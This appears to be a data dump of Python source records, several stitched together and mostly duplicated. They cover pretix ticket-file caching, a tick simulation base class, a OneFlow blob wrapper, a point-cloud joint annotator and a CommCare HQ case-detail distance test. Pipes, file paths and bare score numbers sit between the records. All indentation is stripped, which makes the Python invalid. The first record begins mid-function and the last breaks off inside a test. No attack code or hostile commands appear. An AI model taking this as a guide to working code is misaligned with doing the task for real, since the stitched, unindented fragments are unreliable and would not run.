for ct in CachedTicket.objects.filter(order_position=order_position, provider=provider):
ct.delete()
ct = CachedTicket.objects.create(order_position=order_position, provider=provider,
extension=ext, type=ttype, file=None)
ct.file.save(filename, ContentFile(data))
return ct.pk
def generate_order(order: int, provider: str):
order = Order.objects.select_related('event').get(id=order)
with language(order.locale, order.event.settings.region):
responses = register_ticket_outputs.send(order.event)
for receiver, response in responses:
prov = response(order.event)
if prov.identifier == provider:
filename, ttype, data = prov.generate_order(order)
if ttype == 'text/uri-list':
continue
path, ext = os.path.splitext(filename)
for ct in CachedCombinedTicket.objects.filter(order=order, provider=provider):
ct.delete()
ct = CachedCombinedTicket.objects.create(order=order, provider=provider, extension=ext,
type=ttype, file=None)
ct.file.save(filename, ContentFile(data))
return ct.pk
@app.task(base=ProfiledTask)
def generate(model: str, pk: int, provider: str):
with scopes_disabled():
if model == 'order':
return generate_order(pk, provider)
elif model == 'orderposition':
return generate_orderposition(pk, provider)
class DummyRollbackException(Exception):
pass
def preview(event: int, provider: str):
event = Event.objects.get(id=event)
with rolledback_transaction(), language(event.settings.locale, event.settings.region):
item = event.items.create(name=_("Sample product"), default_price=42.23,
description=_("Sample product description"))
item2 = event.items.create(name=_("Sample workshop"), default_price=23.40)
from pretix.base.models import Order
order = event.orders.create(status=Order.STATUS_PENDING, datetime=now(),
email='<EMAIL>',
locale=event.settings.locale,
expires=now(), code="PREVIEW1234", total=119)
scheme = PERSON_NAME_SCHEMES[event.settings.name_scheme]
sample = {k: str(v) for k, v in scheme['sample'].items()}
p = order.positions.create(item=item, attendee_name_parts=sample, price=item.default_price)
s = event.subevents.first()
order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
InvoiceAddress.objects.create(order=order, name_parts=sample, company=_("Sample company"))
responses = register_ticket_outputs.send(event)
for receiver, response in responses:
prov = response(event)
if prov.identifier == provider:
return prov.generate(p)
def get_tickets_for_order(order, base_position=None):
can_download = all([r for rr, r in allow_ticket_download.send(order.event, order=order)])
if not can_download:
return []
if not order.ticket_download_available:
return []
providers = [
response(order.event)
for receiver, response
in register_ticket_outputs.send(order.event)
]
tickets = []
positions = list(order.positions_with_tickets)
if base_position:
# Only the given position and its children
positions = [
p for p in positions if p.pk == base_position.pk or p.addon_to_id == base_position.pk
]
for p in providers:
if not p.is_enabled:
continue
if p.multi_download_enabled and not base_position:
try:
if len(positions) == 0:
continue
ct = CachedCombinedTicket.objects.filter(
order=order, provider=p.identifier, file__isnull=False
).last()
if not ct or not ct.file:
retval = generate_order(order.pk, p.identifier)
if not retval:
continue
ct = CachedCombinedTicket.objects.get(pk=retval)
tickets.append((
"{}-{}-{}{}".format(
order.event.slug.upper(), order.code, ct.provider, ct.extension,
),
ct
))
except:
logger.exception('Failed to generate ticket.')
else:
for pos in positions:
try:
ct = CachedTicket.objects.filter(
order_position=pos, provider=p.identifier, file__isnull=False
).last()
if not ct or not ct.file:
retval = generate_orderposition(pos.pk, p.identifier)
if not retval:
continue
ct = CachedTicket.objects.get(pk=retval)
if ct.type == 'text/uri-list':
continue
if pos.subevent:
# Subevent date in filename improves accessibility e.g. for screen reader users
fname = "{}-{}-{}-{}-{}{}".format(
order.event.slug.upper(), order.code, pos.positionid,
pos.subevent.date_from.strftime('%Y_%m_%d'),
ct.provider, ct.extension
)
else:
fname = "{}-{}-{}-{}{}".format(
order.event.slug.upper(), order.code, pos.positionid,
ct.provider, ct.extension
)
tickets.append((
fname,
ct
))
except:
logger.exception('Failed to generate ticket.')
return tickets
@app.task(base=EventTask, acks_late=True)
def invalidate_cache(event: Event, item: int=None, provider: str=None, order: int=None, **kwargs):
qs = CachedTicket.objects.filter(order_position__order__event=event)
qsc = CachedCombinedTicket.objects.filter(order__event=event)
if item:
qs = qs.filter(order_position__item_id=item)
if provider:
qs = qs.filter(provider=provider)
qsc = qsc.filter(provider=provider)
if order:
qs = qs.filter(order_position__order_id=order)
qsc = qsc.filter(order_id=order)
for ct in qs:
ct.delete()
for ct in qsc:
ct.delete() | 0.375363 | 0.086593 |
from abc import ABC, abstractmethod
from time import time
import numpy as np
from tick.base import Base
class Simu(ABC, Base):
"""
Abstract simulation class. It does nothing besides printing and
verbosing.
Parameters
----------
seed : `int`
The seed of the random number generator
verbose : `bool`
If True, print things
Attributes
----------
time_start : `str`
Start date of the simulation
time_elapsed : `int`
Duration of the simulation, in seconds
time_end : `str`
End date of the simulation
"""
_attrinfos = {
"time_start": {
"writable": False
},
"time_elapsed": {
"writable": False
},
"time_end": {
"writable": False
},
"_time_start": {
"writable": False
}
}
def __init__(self, seed: int = None, verbose: bool = True):
Base.__init__(self)
self.seed = seed
self.verbose = verbose
if seed is not None and seed >= 0:
self._set_seed()
self._set("time_start", None)
self._set("time_elapsed", None)
self._set("time_end", None)
self._set("_time_start", None)
def _set_seed(self):
np.random.seed(self.seed)
def _start_simulation(self):
self._set("time_start", self._get_now())
self._set("_time_start", time())
if self.verbose:
msg = "Launching simulation using {class_}..." \
.format(class_=self.name)
print("-" * len(msg))
print(msg)
def _end_simulation(self):
self._set("time_end", self._get_now())
t = time()
self._set("time_elapsed", t - self._time_start)
if self.verbose:
msg = "Done simulating using {class_} in {time:.2e} " \
"seconds." \
.format(class_=self.name, time=self.time_elapsed)
print(msg)
@abstractmethod
def _simulate(self):
pass
def simulate(self):
"""Launch the simulation of data
"""
self._start_simulation()
result = self._simulate()
self._end_simulation()
return result
def _as_dict(self):
dd = Base._as_dict(self)
dd.pop("coeffs", None)
return dd | tick/base/simulation/simu.py |
from abc import ABC, abstractmethod
from time import time
import numpy as np
from tick.base import Base
class Simu(ABC, Base):
"""
Abstract simulation class. It does nothing besides printing and
verbosing.
Parameters
----------
seed : `int`
The seed of the random number generator
verbose : `bool`
If True, print things
Attributes
----------
time_start : `str`
Start date of the simulation
time_elapsed : `int`
Duration of the simulation, in seconds
time_end : `str`
End date of the simulation
"""
_attrinfos = {
"time_start": {
"writable": False
},
"time_elapsed": {
"writable": False
},
"time_end": {
"writable": False
},
"_time_start": {
"writable": False
}
}
def __init__(self, seed: int = None, verbose: bool = True):
Base.__init__(self)
self.seed = seed
self.verbose = verbose
if seed is not None and seed >= 0:
self._set_seed()
self._set("time_start", None)
self._set("time_elapsed", None)
self._set("time_end", None)
self._set("_time_start", None)
def _set_seed(self):
np.random.seed(self.seed)
def _start_simulation(self):
self._set("time_start", self._get_now())
self._set("_time_start", time())
if self.verbose:
msg = "Launching simulation using {class_}..." \
.format(class_=self.name)
print("-" * len(msg))
print(msg)
def _end_simulation(self):
self._set("time_end", self._get_now())
t = time()
self._set("time_elapsed", t - self._time_start)
if self.verbose:
msg = "Done simulating using {class_} in {time:.2e} " \
"seconds." \
.format(class_=self.name, time=self.time_elapsed)
print(msg)
@abstractmethod
def _simulate(self):
pass
def simulate(self):
"""Launch the simulation of data
"""
self._start_simulation()
result = self._simulate()
self._end_simulation()
return result
def _as_dict(self):
dd = Base._as_dict(self)
dd.pop("coeffs", None)
return dd | 0.848282 | 0.475118 |
from __future__ import absolute_import
import collections
from functools import reduce
import numpy as np
import oneflow as flow
import oneflow_api
from google.protobuf import text_format
from oneflow.python.framework.dtype import convert_proto_dtype_to_oneflow_dtype
from oneflow.python.lib.core.box import Box
class OfBlob(object):
def __init__(self, of_blob_ptr):
self.of_blob_ptr_ = of_blob_ptr
@property
def dtype(self):
return convert_proto_dtype_to_oneflow_dtype(
oneflow_api.Ofblob_GetDataType(self.of_blob_ptr_)
)
@property
def static_shape(self):
num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
dst_ndarray = np.ndarray(num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyStaticShapeTo(self.of_blob_ptr_, dst_ndarray)
return tuple(dst_ndarray.tolist())
@property
def shape(self):
num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
dst_ndarray = np.zeros(num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, dst_ndarray)
return tuple(dst_ndarray.tolist())
def set_shape(self, shape):
assert isinstance(shape, (list, tuple))
assert len(shape) == oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
oneflow_api.OfBlob_CopyShapeFrom(
self.of_blob_ptr_, np.array(shape, dtype=np.int64)
)
@property
def num_axes(self):
return oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
@property
def is_dynamic(self):
return oneflow_api.OfBlob_IsDynamic(self.of_blob_ptr_)
def CopyToNdarray(self):
return self._CopyToNdarray()
def CopyFromNdarray(self, src_ndarray):
if self.is_dynamic:
self.set_shape(src_ndarray.shape)
else:
shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
shape = tuple(shape_tensor.tolist())
assert src_ndarray.shape == shape
return self._CopyBodyFromNdarray(src_ndarray)
def _CopyBodyFromNdarray(self, src_ndarray):
method_name = oneflow_api.Dtype_GetOfBlobCopyFromBufferFuncName(
oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
)
copy_method = getattr(oneflow_api, method_name)
copy_method(self.of_blob_ptr_, src_ndarray)
def _CopyToNdarray(self):
method_name = oneflow_api.Dtype_GetOfBlobCopyToBufferFuncName(
oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
)
copy_method = getattr(oneflow_api, method_name)
shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
shape = tuple(shape_tensor.tolist())
tensor = np.zeros(
shape, dtype=flow.convert_oneflow_dtype_to_numpy_dtype(self.dtype)
)
copy_method(self.of_blob_ptr_, tensor)
return tensor | oneflow/python/framework/ofblob.py | from __future__ import absolute_import
import collections
from functools import reduce
import numpy as np
import oneflow as flow
import oneflow_api
from google.protobuf import text_format
from oneflow.python.framework.dtype import convert_proto_dtype_to_oneflow_dtype
from oneflow.python.lib.core.box import Box
class OfBlob(object):
def __init__(self, of_blob_ptr):
self.of_blob_ptr_ = of_blob_ptr
@property
def dtype(self):
return convert_proto_dtype_to_oneflow_dtype(
oneflow_api.Ofblob_GetDataType(self.of_blob_ptr_)
)
@property
def static_shape(self):
num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
dst_ndarray = np.ndarray(num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyStaticShapeTo(self.of_blob_ptr_, dst_ndarray)
return tuple(dst_ndarray.tolist())
@property
def shape(self):
num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
dst_ndarray = np.zeros(num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, dst_ndarray)
return tuple(dst_ndarray.tolist())
def set_shape(self, shape):
assert isinstance(shape, (list, tuple))
assert len(shape) == oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
oneflow_api.OfBlob_CopyShapeFrom(
self.of_blob_ptr_, np.array(shape, dtype=np.int64)
)
@property
def num_axes(self):
return oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
@property
def is_dynamic(self):
return oneflow_api.OfBlob_IsDynamic(self.of_blob_ptr_)
def CopyToNdarray(self):
return self._CopyToNdarray()
def CopyFromNdarray(self, src_ndarray):
if self.is_dynamic:
self.set_shape(src_ndarray.shape)
else:
shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
shape = tuple(shape_tensor.tolist())
assert src_ndarray.shape == shape
return self._CopyBodyFromNdarray(src_ndarray)
def _CopyBodyFromNdarray(self, src_ndarray):
method_name = oneflow_api.Dtype_GetOfBlobCopyFromBufferFuncName(
oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
)
copy_method = getattr(oneflow_api, method_name)
copy_method(self.of_blob_ptr_, src_ndarray)
def _CopyToNdarray(self):
method_name = oneflow_api.Dtype_GetOfBlobCopyToBufferFuncName(
oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
)
copy_method = getattr(oneflow_api, method_name)
shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
shape = tuple(shape_tensor.tolist())
tensor = np.zeros(
shape, dtype=flow.convert_oneflow_dtype_to_numpy_dtype(self.dtype)
)
copy_method(self.of_blob_ptr_, tensor)
return tensor | 0.606382 | 0.48438 |
import os
import open3d as o3d
import numpy as np
import copy
import json
from math import *
from PyQt5.QtCore import *
from utils.util_func import transform_coordinates_3d, Scaling
from utils.axis_aligner import AxisAligner
from utils.part_segmentator import PartSegmentator
from utils.joint_annotator import JointAnnotator
from utils.animation import AnimationPlayer
from utils.urdf_exporter import URDFExporter
class Annotator():
def __init__(self,
annotation_material_path,
save_path=None):
self.model_to_be_annotated_path = None
self.annotation_material_path = annotation_material_path
self.annotation_material_list = [p for p in os.listdir(self.annotation_material_path) if p.endswith('.obj')]
self.save_path = save_path
self.temp_path = None
self.model_to_be_annotated = None
self.annotation_material = None
self.view_param = None
self.align_transformation = None
self.joint_transformation = None
self.demo_img_axis_align = None
self.demo_img_part_segmentation = None
self.demo_img_joint_annotation = None
self.annotated_joint_infos = []
self.material_color = 'color1'
self.axis_aligner = AxisAligner()
self.part_segmentator = PartSegmentator()
self.joint_annotator = JointAnnotator()
self.animation_player = AnimationPlayer()
self.urdf_exporter = URDFExporter()
self.current_ann_stage = "Axis Align"
def init_annotator(self):
self.current_material_index = 0
self.model_to_be_annotated_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
self.model_to_be_annotated_name = self.model_to_be_annotated_path.split('/')[-1].split('_')[0] + '.ply'
self.model_to_be_annotated = o3d.io.read_point_cloud(os.path.join(self.model_to_be_annotated_path,
self.model_to_be_annotated_name))
self.demo_img_init, self.view_param = self.generate_demo_img()
self.init_align_transformation_path = os.path.join(self.temp_path, 'align_transformation.json')
if os.path.lexists(self.init_align_transformation_path):
f = json.load(open(self.init_align_transformation_path))
self.align_transformation = np.array(f['align_transformation'])
# self.model_to_be_annotated.transform(self.align_transformation)
self.init_joint_transformation_path = os.path.join(self.temp_path, 'joint_transformation.json')
if os.path.lexists(self.init_joint_transformation_path):
f = json.load(open(self.init_joint_transformation_path))
self.joint_transformation = np.array(f['joint_transformation'])
self.axis_aligner.init_annotator(self.model_to_be_annotated,
init_align_transformation=self.align_transformation)
self.part_segmentator.init_annotator(self.model_to_be_annotated,
part_mesh_save_path=self.model_to_be_annotated_path)
self.joint_annotator.init_annotator(self.model_to_be_annotated,
init_joint_transformation=self.joint_transformation)
# self.reset()
def update_model(self, id):
obj_name, obj_color = id.split('_')
self.material_color = obj_color
self.current_material_index = self.annotation_material_list.index(obj_name + '.obj')
self.reset()
def reset(self):
self.annotation_material = self.annotation_material_path + '/' + self.annotation_material_list[self.current_material_index]
self.axis_aligner.reset(self.annotation_material, self.model_to_be_annotated, self.material_color)
self.part_segmentator.reset(self.model_to_be_annotated)
self.joint_annotator.reset(self.model_to_be_annotated)
def set_animation_info(self, parent_file, child_file, lower, upper, joint_type):
self.animation_parent_mesh = o3d.io.read_point_cloud(parent_file.split(os.getcwd().replace('\\', '/'))[1][1:])
self.animation_child_mesh = o3d.io.read_point_cloud(child_file.split(os.getcwd().replace('\\', '/'))[1][1:])
self.animation_joint_lower = lower
self.animation_joint_upper = upper
self.animation_joint_type = joint_type
def begin_annotation(self, stage):
if stage == "axis align":
self.align_transformation, self.view_param = self.axis_aligner.begin_annotation(self.view_param)
self.axis_aligner.save_align_transformation(self.temp_path)
self.demo_img_axis_align, self.view_param = self.axis_aligner.generate_demo_img(view_point=self.view_param)
elif stage == "part segmentation":
self.view_param = self.part_segmentator.begin_annotation(self.view_param, self.align_transformation)
self.demo_img_part_segmentation, self.view_param = self.part_segmentator.generate_demo_img(view_point=self.view_param)
elif stage == "joint annotation":
self.joint_transformation, self.view_param = self.joint_annotator.begin_annotation(self.view_param)
self.joint_annotator.save_joint_transformation(self.temp_path)
self.demo_img_joint_annotation, self.view_param = self.joint_annotator.generate_demo_img(view_point=self.view_param)
def generate_demo_img(self, view_point=None):
axis_pcd_temp = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.0001, origin=[0, 0, 0])
vis_temp = o3d.visualization.Visualizer()
vis_temp.create_window(visible=False)
vis_temp.add_geometry(self.model_to_be_annotated)
vis_temp.add_geometry(axis_pcd_temp)
if view_point is None:
view_point = vis_temp.get_view_control().convert_to_pinhole_camera_parameters()
else:
vis_temp.get_view_control().convert_from_pinhole_camera_parameters(view_point)
vis_temp.poll_events()
vis_temp.update_renderer()
demo_img = vis_temp.capture_screen_float_buffer(True)
# vis_temp.run()
vis_temp.destroy_window()
return demo_img, view_point
def play_animation(self):
self.animation_player.play_animation(self.animation_parent_mesh,
self.animation_child_mesh,
self.animation_joint_lower,
self.animation_joint_upper,
self.animation_joint_type,
self.joint_transformation,
self.view_param)
def saveann(self):
save_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
"""Save annotation and quit"""
""" Save output files """
ann_dict = {}
ann_dict['image_name'] = self.cimg.split(os.getcwd().replace('\\', '/'))[1][1:]
ann_dict['joint_transformation'] = self.joint_transformation.tolist()
ann_dict['joint_type'] = self.joint_type
with open(save_path + '/' + 'joint.json', 'w') as f_out:
json.dump(ann_dict, f_out)
def record_joint_info(self, parent_file, child_file, lower, upper, joint_type):
parent_name = os.path.basename(parent_file.split(os.getcwd().replace('\\', '/'))[1][1:])
child_name = os.path.basename(child_file.split(os.getcwd().replace('\\', '/'))[1][1:])
joint_name = parent_name.split('.')[0] + '|' + joint_type + '|' + child_name.split('.')[0]
if all(joint_name not in v for v in self.annotated_joint_infos):
joint_info = {}
joint_info['name'] = joint_name
joint_info['parent'] = parent_name
joint_info['child'] = child_name
joint_info['lower'] = float(lower) if lower != '' else 0
joint_info['upper'] = float(upper) if upper != '' else 0
joint_info['type'] = joint_type
start_point = np.array([0., 0., 0.])
end_point = np.array([0., 0., 1.])
line_points = np.stack([start_point, end_point])
line_points = transform_coordinates_3d(line_points.T, self.joint_transformation).T
line_points = transform_coordinates_3d(line_points.T, np.linalg.inv(self.align_transformation)).T
joint_info['xyz'] = line_points[0].tolist()
joint_info['rpy'] = (line_points[1] - line_points[0]).tolist()
self.annotated_joint_infos.append(joint_info)
def save_urdf(self, save_file_path):
save_file_path = save_file_path.split(os.getcwd().replace('\\', '/'))[1][1:]
self.urdf_exporter.export_urdf(save_file_path,
joint_infos=self.annotated_joint_infos,
part_path=os.path.join(self.model_to_be_annotated_path, 'part_meshes')) | annotator_window.py | import os
import open3d as o3d
import numpy as np
import copy
import json
from math import *
from PyQt5.QtCore import *
from utils.util_func import transform_coordinates_3d, Scaling
from utils.axis_aligner import AxisAligner
from utils.part_segmentator import PartSegmentator
from utils.joint_annotator import JointAnnotator
from utils.animation import AnimationPlayer
from utils.urdf_exporter import URDFExporter
class Annotator():
def __init__(self,
annotation_material_path,
save_path=None):
self.model_to_be_annotated_path = None
self.annotation_material_path = annotation_material_path
self.annotation_material_list = [p for p in os.listdir(self.annotation_material_path) if p.endswith('.obj')]
self.save_path = save_path
self.temp_path = None
self.model_to_be_annotated = None
self.annotation_material = None
self.view_param = None
self.align_transformation = None
self.joint_transformation = None
self.demo_img_axis_align = None
self.demo_img_part_segmentation = None
self.demo_img_joint_annotation = None
self.annotated_joint_infos = []
self.material_color = 'color1'
self.axis_aligner = AxisAligner()
self.part_segmentator = PartSegmentator()
self.joint_annotator = JointAnnotator()
self.animation_player = AnimationPlayer()
self.urdf_exporter = URDFExporter()
self.current_ann_stage = "Axis Align"
def init_annotator(self):
self.current_material_index = 0
self.model_to_be_annotated_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
self.model_to_be_annotated_name = self.model_to_be_annotated_path.split('/')[-1].split('_')[0] + '.ply'
self.model_to_be_annotated = o3d.io.read_point_cloud(os.path.join(self.model_to_be_annotated_path,
self.model_to_be_annotated_name))
self.demo_img_init, self.view_param = self.generate_demo_img()
self.init_align_transformation_path = os.path.join(self.temp_path, 'align_transformation.json')
if os.path.lexists(self.init_align_transformation_path):
f = json.load(open(self.init_align_transformation_path))
self.align_transformation = np.array(f['align_transformation'])
# self.model_to_be_annotated.transform(self.align_transformation)
self.init_joint_transformation_path = os.path.join(self.temp_path, 'joint_transformation.json')
if os.path.lexists(self.init_joint_transformation_path):
f = json.load(open(self.init_joint_transformation_path))
self.joint_transformation = np.array(f['joint_transformation'])
self.axis_aligner.init_annotator(self.model_to_be_annotated,
init_align_transformation=self.align_transformation)
self.part_segmentator.init_annotator(self.model_to_be_annotated,
part_mesh_save_path=self.model_to_be_annotated_path)
self.joint_annotator.init_annotator(self.model_to_be_annotated,
init_joint_transformation=self.joint_transformation)
# self.reset()
def update_model(self, id):
obj_name, obj_color = id.split('_')
self.material_color = obj_color
self.current_material_index = self.annotation_material_list.index(obj_name + '.obj')
self.reset()
def reset(self):
self.annotation_material = self.annotation_material_path + '/' + self.annotation_material_list[self.current_material_index]
self.axis_aligner.reset(self.annotation_material, self.model_to_be_annotated, self.material_color)
self.part_segmentator.reset(self.model_to_be_annotated)
self.joint_annotator.reset(self.model_to_be_annotated)
def set_animation_info(self, parent_file, child_file, lower, upper, joint_type):
self.animation_parent_mesh = o3d.io.read_point_cloud(parent_file.split(os.getcwd().replace('\\', '/'))[1][1:])
self.animation_child_mesh = o3d.io.read_point_cloud(child_file.split(os.getcwd().replace('\\', '/'))[1][1:])
self.animation_joint_lower = lower
self.animation_joint_upper = upper
self.animation_joint_type = joint_type
def begin_annotation(self, stage):
if stage == "axis align":
self.align_transformation, self.view_param = self.axis_aligner.begin_annotation(self.view_param)
self.axis_aligner.save_align_transformation(self.temp_path)
self.demo_img_axis_align, self.view_param = self.axis_aligner.generate_demo_img(view_point=self.view_param)
elif stage == "part segmentation":
self.view_param = self.part_segmentator.begin_annotation(self.view_param, self.align_transformation)
self.demo_img_part_segmentation, self.view_param = self.part_segmentator.generate_demo_img(view_point=self.view_param)
elif stage == "joint annotation":
self.joint_transformation, self.view_param = self.joint_annotator.begin_annotation(self.view_param)
self.joint_annotator.save_joint_transformation(self.temp_path)
self.demo_img_joint_annotation, self.view_param = self.joint_annotator.generate_demo_img(view_point=self.view_param)
def generate_demo_img(self, view_point=None):
axis_pcd_temp = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.0001, origin=[0, 0, 0])
vis_temp = o3d.visualization.Visualizer()
vis_temp.create_window(visible=False)
vis_temp.add_geometry(self.model_to_be_annotated)
vis_temp.add_geometry(axis_pcd_temp)
if view_point is None:
view_point = vis_temp.get_view_control().convert_to_pinhole_camera_parameters()
else:
vis_temp.get_view_control().convert_from_pinhole_camera_parameters(view_point)
vis_temp.poll_events()
vis_temp.update_renderer()
demo_img = vis_temp.capture_screen_float_buffer(True)
# vis_temp.run()
vis_temp.destroy_window()
return demo_img, view_point
def play_animation(self):
self.animation_player.play_animation(self.animation_parent_mesh,
self.animation_child_mesh,
self.animation_joint_lower,
self.animation_joint_upper,
self.animation_joint_type,
self.joint_transformation,
self.view_param)
def saveann(self):
save_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
"""Save annotation and quit"""
""" Save output files """
ann_dict = {}
ann_dict['image_name'] = self.cimg.split(os.getcwd().replace('\\', '/'))[1][1:]
ann_dict['joint_transformation'] = self.joint_transformation.tolist()
ann_dict['joint_type'] = self.joint_type
with open(save_path + '/' + 'joint.json', 'w') as f_out:
json.dump(ann_dict, f_out)
def record_joint_info(self, parent_file, child_file, lower, upper, joint_type):
parent_name = os.path.basename(parent_file.split(os.getcwd().replace('\\', '/'))[1][1:])
child_name = os.path.basename(child_file.split(os.getcwd().replace('\\', '/'))[1][1:])
joint_name = parent_name.split('.')[0] + '|' + joint_type + '|' + child_name.split('.')[0]
if all(joint_name not in v for v in self.annotated_joint_infos):
joint_info = {}
joint_info['name'] = joint_name
joint_info['parent'] = parent_name
joint_info['child'] = child_name
joint_info['lower'] = float(lower) if lower != '' else 0
joint_info['upper'] = float(upper) if upper != '' else 0
joint_info['type'] = joint_type
start_point = np.array([0., 0., 0.])
end_point = np.array([0., 0., 1.])
line_points = np.stack([start_point, end_point])
line_points = transform_coordinates_3d(line_points.T, self.joint_transformation).T
line_points = transform_coordinates_3d(line_points.T, np.linalg.inv(self.align_transformation)).T
joint_info['xyz'] = line_points[0].tolist()
joint_info['rpy'] = (line_points[1] - line_points[0]).tolist()
self.annotated_joint_infos.append(joint_info)
def save_urdf(self, save_file_path):
save_file_path = save_file_path.split(os.getcwd().replace('\\', '/'))[1][1:]
self.urdf_exporter.export_urdf(save_file_path,
joint_infos=self.annotated_joint_infos,
part_path=os.path.join(self.model_to_be_annotated_path, 'part_meshes')) | 0.403097 | 0.118819 |
from django.test import SimpleTestCase
from corehq.apps.app_manager.models import SortElement
from corehq.apps.app_manager.tests.app_factory import AppFactory
from corehq.apps.app_manager.tests.util import TestXmlMixin
class CaseDetailDistance(SimpleTestCase, TestXmlMixin):
def setUp(self):
self.factory = AppFactory(build_version='2.26.0')
self.factory.new_basic_module('registration', 'patient registration')
module = self.factory.app.get_module(0)
self.case_details = module.case_details
def test_short_detail_xml(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
<sort direction="ascending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
def test_short_detail_xml_with_sort(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short.sort_elements.append(
SortElement(
field=short_column.field,
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="case_name"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
def test_short_detail_xml_sort_only(self):
short = self.case_details.short
short.display = 'short'
short.sort_elements.append(
SortElement(
field='gps',
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="case_name"/>
</text>
</template>
</field>
<field>
<header width="0">
<text/>
</header>
<template width="0">
<text>
<xpath function="gps"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(gps = '', 2147483647, round(distance(gps, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
def test_long_detail_xml(self):
long_ = self.case_details.long
long_.display = 'long'
long_column = long_.get_column(0)
long_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_long"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_long.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
</field>
</partial>
""",
suite,
template_xpath
) | corehq/apps/app_manager/tests/test_case_detail_distance.py | from django.test import SimpleTestCase
from corehq.apps.app_manager.models import SortElement
from corehq.apps.app_manager.tests.app_factory import AppFactory
from corehq.apps.app_manager.tests.util import TestXmlMixin
class CaseDetailDistance(SimpleTestCase, TestXmlMixin):
def setUp(self):
self.factory = AppFactory(build_version='2.26.0')
self.factory.new_basic_module('registration', 'patient registration')
module = self.factory.app.get_module(0)
self.case_details = module.case_details
def test_short_detail_xml(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
<sort direction="ascending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
def test_short_detail_xml_with_sort(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short.sort_elements.append(
SortElement(
field=short_column.field,
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
